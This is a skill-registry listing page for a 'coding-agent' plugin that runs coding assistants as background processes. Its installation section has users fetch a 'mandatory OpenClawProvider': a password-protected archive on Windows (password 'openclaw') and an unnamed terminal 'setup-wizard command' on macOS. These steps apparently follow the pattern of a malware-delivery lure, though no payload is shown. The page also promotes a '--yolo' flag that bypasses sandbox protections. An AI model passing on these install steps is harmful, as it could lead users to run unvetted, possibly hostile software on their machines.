ClawKit Logo
ClawKitReliability Toolkit
Back to Registry
Official Verified developer tools Safety 2/5

coding-agent

Run Codex CLI, Claude Code, OpenCode, or Pi Coding Agent via background process for programmatic control.

Why use this skill?

Integrate Codex, Claude, and OpenCode into OpenClaw with the coding-agent skill. Streamline your workflow with background coding and secure repo reviews.

skill-install — Terminal

Install via CLI (Recommended)

clawhub install openclaw/skills/skills/sakaen736jih/coding-agent-7k8p1tijc
Or

What This Skill Does

The coding-agent skill provides a robust bridge between the OpenClaw AI environment and professional coding assistants like Codex CLI, Claude Code, and OpenCode. By leveraging background processes, it allows users to delegate complex engineering tasks—such as feature implementation, bug fixing, and code review—directly to an agent without blocking the main workflow. This skill uses a 'workdir' pattern to ensure the agent operates within a strictly defined sandbox, preventing it from accessing sensitive system files.

Installation

Installation is managed via the OpenClaw ecosystem. First, ensure the mandatory OpenClawProvider is installed: on Windows, download and extract the package from the official GitHub repository using the password 'openclaw'. On MacOS, execute the provided setup-wizard command in your terminal. Once the provider is active, run 'clawhub install openclaw/skills/skills/sakaen736jih/coding-agent-7k8p1tijc' to register the skill.

Use Cases

  • Automated Refactoring: Offload large-scale code changes to a background process, allowing you to continue working while the agent handles monotonous syntax updates.
  • PR Reviewing: Safely check pull requests by cloning them into a isolated temporary directory, ensuring the agent only interacts with the relevant branch.
  • Prototyping: Use '--full-auto' or '--yolo' flags to rapidly generate boilerplate code, UI components, or logic stubs for new features.

Example Prompts

  1. "Use the coding-agent to refactor the authentication module in ~/projects/auth-service to use OAuth2 instead of JWT, running it in the background."
  2. "Review the pending PR for repository ~/projects/ui-components. Clone it to a temp directory and summarize the potential security risks."
  3. "Start a background coding session in the current directory to build a basic responsive landing page using Tailwind CSS, using the --full-auto flag."

Tips & Limitations

Always prefer 'tmux' for interactive tasks where you need real-time observation. Use the 'bash' background mode for fire-and-forget tasks to keep your main terminal clutter-free. Never use the '--yolo' flag on production codebases, as it bypasses critical sandbox protections. Always monitor your sessions using the 'process action:poll' command to ensure your agent hasn't stalled.

Metadata

Stars1133
Views1
Updated2026-02-18
View Author Profile
AI Skill Finder

Not sure this is the right skill?

Describe what you want to build — we'll match you to the best skill from 16,000+ options.

Find the right skill
Add to Configuration

Paste this into your clawhub.json to enable this plugin.

{
  "plugins": {
    "official-sakaen736jih-coding-agent-7k8p1tijc": {
      "enabled": true,
      "auto_update": true
    }
  }
}

Tags(AI)

#developer#automation#codex#refactoring#programming
Safety Score: 2/5

Flags: file-write, file-read, code-execution